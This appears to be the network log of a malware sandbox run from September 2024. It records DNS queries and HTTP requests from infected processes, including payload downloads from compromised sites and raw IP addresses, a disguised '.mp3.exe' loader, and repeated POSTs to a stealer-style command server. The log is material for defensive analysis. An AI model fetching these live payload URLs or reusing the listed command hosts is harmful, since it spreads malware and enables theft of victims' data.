tryyudjasudqo.shop

IN A

Response
DNS

steamcommunity.com

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

steamcommunity.com

IN A

Response

steamcommunity.com

IN A

2.22.99.85
GET

https://steamcommunity.com/profiles/76561199724331900

BitLockerToGo.exe

Remote address:

2.22.99.85:443

Request

GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Thu, 19 Sep 2024 04:34:10 GMT
Content-Length: 34734
Connection: keep-alive
Set-Cookie: sessionid=35a5f398c96a7a064e58f056; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=GB%7C0cca5b35055ce513436d8b708d875660; Path=/; Secure; HttpOnly; SameSite=None
DNS

tenntysjuxmz.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

tenntysjuxmz.shop

IN A

Response
DNS

85.99.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

85.99.22.2.in-addr.arpa

IN PTR

Response

85.99.22.2.in-addr.arpa

IN PTR

a2-22-99-85deploystaticakamaitechnologiescom
DNS

103.169.127.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

103.169.127.40.in-addr.arpa

IN PTR

Response
DNS

56.126.166.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.126.166.20.in-addr.arpa

IN PTR

Response
DNS

innovaxingenieros.com

New Text Document mod.exe

Remote address:

8.8.8.8:53

Request

innovaxingenieros.com

IN A

Response

innovaxingenieros.com

IN A

167.114.163.236
GET

https://innovaxingenieros.com/vfagms15.exe

New Text Document mod.exe

Remote address:

167.114.163.236:443

Request

GET /vfagms15.exe HTTP/1.1
Host: innovaxingenieros.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:23 GMT
Server: Apache
Last-Modified: Wed, 18 Sep 2024 06:33:53 GMT
Accept-Ranges: bytes
Content-Length: 299936
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
GET

https://innovaxingenieros.com/vsfdajg16.exe

New Text Document mod.exe

Remote address:

167.114.163.236:443

Request

GET /vsfdajg16.exe HTTP/1.1
Host: innovaxingenieros.com

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:23 GMT
Server: Apache
Last-Modified: Wed, 18 Sep 2024 06:33:55 GMT
Accept-Ranges: bytes
Content-Length: 299936
Content-Type: application/x-msdownload
GET

https://innovaxingenieros.com/lnfsda.exe

New Text Document mod.exe

Remote address:

167.114.163.236:443

Request

GET /lnfsda.exe HTTP/1.1
Host: innovaxingenieros.com

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:24 GMT
Server: Apache
Last-Modified: Wed, 18 Sep 2024 06:33:57 GMT
Accept-Ranges: bytes
Content-Length: 360864
Content-Type: application/x-msdownload
GET

https://innovaxingenieros.com/vkfsags12.exe

New Text Document mod.exe

Remote address:

167.114.163.236:443

Request

GET /vkfsags12.exe HTTP/1.1
Host: innovaxingenieros.com

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:25 GMT
Server: Apache
Last-Modified: Wed, 18 Sep 2024 06:33:49 GMT
Accept-Ranges: bytes
Content-Length: 299936
Content-Type: application/x-msdownload
GET

https://innovaxingenieros.com/smdsg.exe

New Text Document mod.exe

Remote address:

167.114.163.236:443

Request

GET /smdsg.exe HTTP/1.1
Host: innovaxingenieros.com

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:25 GMT
Server: Apache
Last-Modified: Wed, 18 Sep 2024 06:33:48 GMT
Accept-Ranges: bytes
Content-Length: 221600
Content-Type: application/x-msdownload
GET

https://innovaxingenieros.com/vlsadg.exe

New Text Document mod.exe

Remote address:

167.114.163.236:443

Request

GET /vlsadg.exe HTTP/1.1
Host: innovaxingenieros.com

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:26 GMT
Server: Apache
Last-Modified: Wed, 18 Sep 2024 06:33:51 GMT
Accept-Ranges: bytes
Content-Length: 299936
Content-Type: application/x-msdownload
DNS

236.163.114.167.in-addr.arpa

Remote address:

8.8.8.8:53

Request

236.163.114.167.in-addr.arpa

IN PTR

Response

236.163.114.167.in-addr.arpa

IN PTR

h5a1centernet
DNS

t.me

RegAsm.exe

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
GET

https://t.me/edm0d

RegAsm.exe

Remote address:

149.154.167.99:443

Request

GET /edm0d HTTP/1.1
Host: t.me
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0
Date: Thu, 19 Sep 2024 04:34:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12287
Connection: keep-alive
Set-Cookie: stel_ssid=80d2c1cfdca33d4f0a_9539963226977688109; expires=Fri, 20 Sep 2024 04:34:27 GMT; path=/; samesite=None; secure; HttpOnly
Pragma: no-cache
Cache-control: no-store
X-Frame-Options: ALLOW-FROM https://web.telegram.org
Content-Security-Policy: frame-ancestors https://web.telegram.org
Strict-Transport-Security: max-age=35768000
DNS

99.167.154.149.in-addr.arpa

Remote address:

8.8.8.8:53

Request

99.167.154.149.in-addr.arpa

IN PTR

Response
DNS

22.249.124.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.249.124.192.in-addr.arpa

IN PTR

Response

22.249.124.192.in-addr.arpa

IN PTR

cloudproxy10022sucurinet
DNS

keennylrwmqlw.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

keennylrwmqlw.shop

IN A

Response
DNS

licenseodqwmqn.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

licenseodqwmqn.shop

IN A

Response
DNS

tendencctywop.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

tendencctywop.shop

IN A

Response
DNS

tendencctywop.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

tendencctywop.shop

IN A
DNS

tesecuuweqo.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

tesecuuweqo.shop

IN A

Response
DNS

relaxatinownio.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

relaxatinownio.shop

IN A

Response
DNS

reggwardssdqw.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

reggwardssdqw.shop

IN A

Response
DNS

195.0.202.116.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.0.202.116.in-addr.arpa

IN PTR

Response

195.0.202.116.in-addr.arpa

IN PTR

static1950202116clientsyour-serverde
GET

http://46.8.231.109/

Remote address:

46.8.231.109:80

Request

GET / HTTP/1.1
Host: 46.8.231.109
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HIEHDHCFIJDBFHJJDBFH
Host: 46.8.231.109
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:28 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KFCFBFHIEBKJKFHIEBFB
Host: 46.8.231.109
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFI
Host: 46.8.231.109
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:29 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHJJDGHCBGDHIECBGIDA
Host: 46.8.231.109
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://46.8.231.109/c4754d4f680ead72.php

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----KECFCGHIDHCAKEBFCFHC
Host: 46.8.231.109
Content-Length: 4999
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://46.8.231.109/1309cdeb8f4c8736/sqlite3.dll

Remote address:

46.8.231.109:80

Request

GET /1309cdeb8f4c8736/sqlite3.dll HTTP/1.1
Host: 46.8.231.109
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:30 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 14:30:30 GMT
ETag: "10e436-5e7eeebed8d80"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
POST

http://46.8.231.109/c4754d4f680ead72.php

Remote address:

46.8.231.109:80

Request

POST /c4754d4f680ead72.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHIJDHIDBGHJKECBFIID
Host: 46.8.231.109
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:31 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

eemmbryequo.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

eemmbryequo.shop

IN A

Response
DNS

tryyudjasudqo.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

tryyudjasudqo.shop

IN A

Response
DNS

109.231.8.46.in-addr.arpa

Remote address:

8.8.8.8:53

Request

109.231.8.46.in-addr.arpa

IN PTR

Response
DNS

tenntysjuxmz.shop

BitLockerToGo.exe

Remote address:

8.8.8.8:53

Request

tenntysjuxmz.shop

IN A

Response
DNS

11.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.227.111.52.in-addr.arpa

IN PTR

Response
DNS

bitbucket.org

Remote address:

8.8.8.8:53

Request

bitbucket.org

IN A

Response

bitbucket.org

IN A

185.166.142.21

bitbucket.org

IN A

185.166.142.22

bitbucket.org

IN A

185.166.142.23
DNS

bbuseruploads.s3.amazonaws.com

Remote address:

8.8.8.8:53

Request

bbuseruploads.s3.amazonaws.com

IN A

Response

bbuseruploads.s3.amazonaws.com

IN CNAME

s3-1-w.amazonaws.com

s3-1-w.amazonaws.com

IN CNAME

s3-w.us-east-1.amazonaws.com

s3-w.us-east-1.amazonaws.com

IN A

3.5.28.16

s3-w.us-east-1.amazonaws.com

IN A

3.5.24.166

s3-w.us-east-1.amazonaws.com

IN A

16.182.43.41

s3-w.us-east-1.amazonaws.com

IN A

52.217.95.81

s3-w.us-east-1.amazonaws.com

IN A

54.231.162.201

s3-w.us-east-1.amazonaws.com

IN A

3.5.11.119

s3-w.us-east-1.amazonaws.com

IN A

52.217.196.161

s3-w.us-east-1.amazonaws.com

IN A

16.182.107.121
DNS

21.142.166.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

21.142.166.185.in-addr.arpa

IN PTR

Response
DNS

16.28.5.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

16.28.5.3.in-addr.arpa

IN PTR

Response

16.28.5.3.in-addr.arpa

IN PTR

s3-1-w amazonawscom
GET

http://185.215.113.100/well/random.exe

Remote address:

185.215.113.100:80

Request

GET /well/random.exe HTTP/1.1
Host: 185.215.113.100

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:34:47 GMT
Server: Apache/2.4.52 (Ubuntu)
Last-Modified: Thu, 19 Sep 2024 04:31:34 GMT
ETag: "e0864-6227165c33b52"
Accept-Ranges: bytes
Content-Length: 919652
Content-Type: application/x-msdos-program
GET

http://193.187.174.58/search/gefox.exe

Remote address:

193.187.174.58:80

Request

GET /search/gefox.exe HTTP/1.1
Host: 193.187.174.58
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 19 Sep 2024 04:34:48 GMT
Content-Type: application/octet-stream
Content-Length: 3050565
Connection: keep-alive
Content-Description: File Transfer
Content-Disposition: attachment; filename=gefox.exe
Content-Transfer-Encoding: binary
Expires: 0
Cache-Control: must-revalidate
Pragma: public
DNS

58.174.187.193.in-addr.arpa

Remote address:

8.8.8.8:53

Request

58.174.187.193.in-addr.arpa

IN PTR

Response
DNS

epsys.ro

Remote address:

8.8.8.8:53

Request

epsys.ro

IN A

Response

epsys.ro

IN A

89.42.218.72
DNS

72.218.42.89.in-addr.arpa

Remote address:

8.8.8.8:53

Request

72.218.42.89.in-addr.arpa

IN PTR

Response

72.218.42.89.in-addr.arpa

IN PTR

server-0355 whmpanelscom
DNS

nasionaltv.com

Remote address:

8.8.8.8:53

Request

nasionaltv.com

IN A

Response

nasionaltv.com

IN A

203.175.9.144
DNS

144.9.175.203.in-addr.arpa

Remote address:

8.8.8.8:53

Request

144.9.175.203.in-addr.arpa

IN PTR

Response

144.9.175.203.in-addr.arpa

IN PTR

ambunduarumahwebnet
GET

http://193.233.48.63/rar.exe

Remote address:

193.233.48.63:80

Request

GET /rar.exe HTTP/1.1
Host: 193.233.48.63
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 19 Sep 2024 04:34:54 GMT
Content-Type: application/octet-stream
Content-Length: 363520
Last-Modified: Wed, 13 Mar 2024 01:58:49 GMT
Connection: keep-alive
ETag: "65f10859-58c00"
Accept-Ranges: bytes
DNS

www.youtube.com

Remote address:

8.8.8.8:53

Request

www.youtube.com

IN A

Response

www.youtube.com

IN CNAME

youtube-ui.l.google.com

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

216.58.213.14

youtube-ui.l.google.com

IN A

216.58.212.238

youtube-ui.l.google.com

IN A

172.217.169.14

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.200.14

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

142.250.180.14
DNS

spocs.getpocket.com

Remote address:

8.8.8.8:53

Request

spocs.getpocket.com

IN A

Response

spocs.getpocket.com

IN CNAME

prod.ads.prod.webservices.mozgcp.net

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

firefox-api-proxy.cdn.mozilla.net

Remote address:

8.8.8.8:53

Request

firefox-api-proxy.cdn.mozilla.net

IN A

Response

firefox-api-proxy.cdn.mozilla.net

IN CNAME

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN A

34.160.144.191
DNS

prod.remote-settings.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.149.100.209
DNS

youtube-ui.l.google.com

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN A

Response

youtube-ui.l.google.com

IN A

142.250.200.46

youtube-ui.l.google.com

IN A

216.58.213.14

youtube-ui.l.google.com

IN A

142.250.179.238

youtube-ui.l.google.com

IN A

216.58.201.110

youtube-ui.l.google.com

IN A

172.217.16.238

youtube-ui.l.google.com

IN A

216.58.204.78

youtube-ui.l.google.com

IN A

142.250.187.206

youtube-ui.l.google.com

IN A

142.250.187.238

youtube-ui.l.google.com

IN A

216.58.212.206

youtube-ui.l.google.com

IN A

216.58.212.238

youtube-ui.l.google.com

IN A

172.217.169.46

youtube-ui.l.google.com

IN A

142.250.178.14

youtube-ui.l.google.com

IN A

142.250.180.14

youtube-ui.l.google.com

IN A

172.217.169.14

youtube-ui.l.google.com

IN A

142.250.200.14
DNS

shavar.prod.mozaws.net

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A

Response

shavar.prod.mozaws.net

IN A

34.208.252.120

shavar.prod.mozaws.net

IN A

52.12.180.143

shavar.prod.mozaws.net

IN A

44.235.70.79
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN A

34.149.97.1
DNS

prod.ads.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN A

Response

prod.ads.prod.webservices.mozgcp.net

IN A

34.117.188.166
DNS

youtube-ui.l.google.com

Remote address:

8.8.8.8:53

Request

youtube-ui.l.google.com

IN AAAA

Response

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:815::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:821::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:81e::200e

youtube-ui.l.google.com

IN AAAA

2a00:1450:4009:820::200e
DNS

prod.remote-settings.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

prod.content-signature-chains.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

Response

prod.content-signature-chains.prod.webservices.mozgcp.net

IN AAAA

2600:1901:0:92a9::
DNS

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

Remote address:

8.8.8.8:53

Request

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

Response

firefox-api-proxy-prod.pocket.prod.cloudops.mozgcp.net

IN AAAA

2600:1901:0:74e4::
DNS

shavar.prod.mozaws.net

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
DNS

prod.ads.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.ads.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

consent.youtube.com

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.200.46
DNS

firefox-settings-attachments.cdn.mozilla.net

Remote address:

8.8.8.8:53

Request

firefox-settings-attachments.cdn.mozilla.net

IN A

Response

firefox-settings-attachments.cdn.mozilla.net

IN CNAME

attachments.prod.remote-settings.prod.webservices.mozgcp.net

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

consent.youtube.com

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN A

Response

consent.youtube.com

IN A

142.250.200.46
DNS

consent.youtube.com

Remote address:

8.8.8.8:53

Request

consent.youtube.com

IN AAAA

Response

consent.youtube.com

IN AAAA

2a00:1450:4009:823::200e
DNS

r10.o.lencr.org

Remote address:

8.8.8.8:53

Request

r10.o.lencr.org

IN A

Response

r10.o.lencr.org

IN CNAME

o.lencr.edgesuite.net

o.lencr.edgesuite.net

IN CNAME

a1887.dscq.akamai.net

a1887.dscq.akamai.net

IN A

88.221.135.105

a1887.dscq.akamai.net

IN A

88.221.134.89
DNS

firefox-settings-attachments.cdn.mozilla.net

Remote address:

8.8.8.8:53

Request

firefox-settings-attachments.cdn.mozilla.net

IN A

Response

firefox-settings-attachments.cdn.mozilla.net

IN CNAME

attachments.prod.remote-settings.prod.webservices.mozgcp.net

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
GET

http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgRsr0%2BS3EwOUB4TVRZf2dOszg%3D%3D

Remote address:

88.221.135.105:80

Request

GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgRsr0%2BS3EwOUB4TVRZf2dOszg%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: r10.o.lencr.org

Response

HTTP/1.1 200 OK

Server: nginx
Content-Type: application/ocsp-response
Content-Length: 504
ETag: "B6A65F0474D64D62801EE284C91E656EBA15773D9A5CD12587A3564C9ED6439F"
Last-Modified: Thu, 19 Sep 2024 02:29:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=21550
Expires: Thu, 19 Sep 2024 10:34:07 GMT
Date: Thu, 19 Sep 2024 04:34:57 GMT
Connection: keep-alive
DNS

ec2-13-36-178-185.eu-west-3.compute.amazonaws.com

Remote address:

8.8.8.8:53

Request

ec2-13-36-178-185.eu-west-3.compute.amazonaws.com

IN A

Response

ec2-13-36-178-185.eu-west-3.compute.amazonaws.com

IN A

13.36.178.185
GET

http://ec2-13-36-178-185.eu-west-3.compute.amazonaws.com/loader/zabardast-movie2024.mp3.exe

Remote address:

13.36.178.185:80

Request

GET /loader/zabardast-movie2024.mp3.exe HTTP/1.1
Host: ec2-13-36-178-185.eu-west-3.compute.amazonaws.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:35:02 GMT
Server: Apache/2.4.62 (Debian)
Last-Modified: Mon, 16 Sep 2024 17:11:14 GMT
ETag: "30000-6223fa91015ca"
Accept-Ranges: bytes
Content-Length: 196608
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

gacan.zapto.org

Remote address:

8.8.8.8:53

Request

gacan.zapto.org

IN A

Response
DNS

t.me

RegAsm.exe

Remote address:

8.8.8.8:53

Request

t.me

IN A

Response

t.me

IN A

149.154.167.99
DNS

fallaeltro.es

Remote address:

8.8.8.8:53

Request

fallaeltro.es

IN A

Response

fallaeltro.es

IN A

37.153.95.99
GET

http://fallaeltro.es/vtrwh12.exe

Remote address:

37.153.95.99:80

Request

GET /vtrwh12.exe HTTP/1.1
Host: fallaeltro.es
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Thu, 19 Sep 2024 04:35:12 GMT
Server: Apache
Last-Modified: Wed, 11 Sep 2024 05:23:57 GMT
Accept-Ranges: bytes
Content-Length: 289832
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
DNS

prod.remote-settings.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

shavar.prod.mozaws.net

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN A

Response

shavar.prod.mozaws.net

IN A

52.12.180.143

shavar.prod.mozaws.net

IN A

44.235.70.79

shavar.prod.mozaws.net

IN A

34.208.252.120
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

Response

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN A

34.117.121.53
DNS

shavar.prod.mozaws.net

Remote address:

8.8.8.8:53

Request

shavar.prod.mozaws.net

IN AAAA

Response
DNS

attachments.prod.remote-settings.prod.webservices.mozgcp.net

Remote address:

8.8.8.8:53

Request

attachments.prod.remote-settings.prod.webservices.mozgcp.net

IN AAAA

Response
DNS

www.google.com

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

216.58.212.196
DNS

www.google.com

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

216.58.212.196
DNS

tracking-protection.cdn.mozilla.net

Remote address:

8.8.8.8:53

Request

tracking-protection.cdn.mozilla.net

IN A

Response

tracking-protection.cdn.mozilla.net

IN CNAME

tracking-protection.prod.mozaws.net

tracking-protection.prod.mozaws.net

IN A

34.120.158.37
DNS

www.google.com

Remote address:

8.8.8.8:53

Request

www.google.com

IN AAAA

Response

www.google.com

IN AAAA

2a00:1450:4009:80a::2004
DNS

tracking-protection.prod.mozaws.net

Remote address:

8.8.8.8:53

Request

tracking-protection.prod.mozaws.net

IN A

Response

tracking-protection.prod.mozaws.net

IN A

34.120.158.37
DNS

tcgroup.it

Remote address:

8.8.8.8:53

Request

tcgroup.it

IN A

Response

tcgroup.it

IN A

80.88.87.245
DNS

tracking-protection.prod.mozaws.net

Remote address:

8.8.8.8:53

Request

tracking-protection.prod.mozaws.net

IN AAAA

Response
GET

http://tcgroup.it/vhrt12.exe

Remote address:

80.88.87.245:80

Request

GET /vhrt12.exe HTTP/1.1
Host: tcgroup.it
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
cache-control: private, no-cache, no-store, must-revalidate, max-age=0
pragma: no-cache
content-type: text/html
content-length: 1242
date: Thu, 19 Sep 2024 04:35:14 GMT
server: LiteSpeed
vary: Accept-Encoding
DNS

tracking-protection.cdn.mozilla.net

Remote address:

8.8.8.8:53

Request

tracking-protection.cdn.mozilla.net

IN A

Response

tracking-protection.cdn.mozilla.net

IN CNAME

tracking-protection.prod.mozaws.net

tracking-protection.prod.mozaws.net

IN A

34.120.158.37
GET

http://144.34.158.170:999/game/qm2014chs.exe

Remote address:

144.34.158.170:999

Request

GET /game/qm2014chs.exe HTTP/1.1
Host: 144.34.158.170:999
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 19 Sep 2024 04:35:15 GMT
Content-Type: application/octet-stream
Content-Length: 24127400
Connection: keep-alive
Last-Modified: Tue, 21 Sep 2021 15:54:33 GMT
ETag: "614a0039-17027a8"
Accept-Ranges: bytes
GET

http://154.216.20.40/Channel2.exe

Remote address:

154.216.20.40:80

Request

GET /Channel2.exe HTTP/1.1
Host: 154.216.20.40
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 19 Sep 2024 04:35:22 GMT
Content-Type: application/octet-stream
Content-Length: 2274400
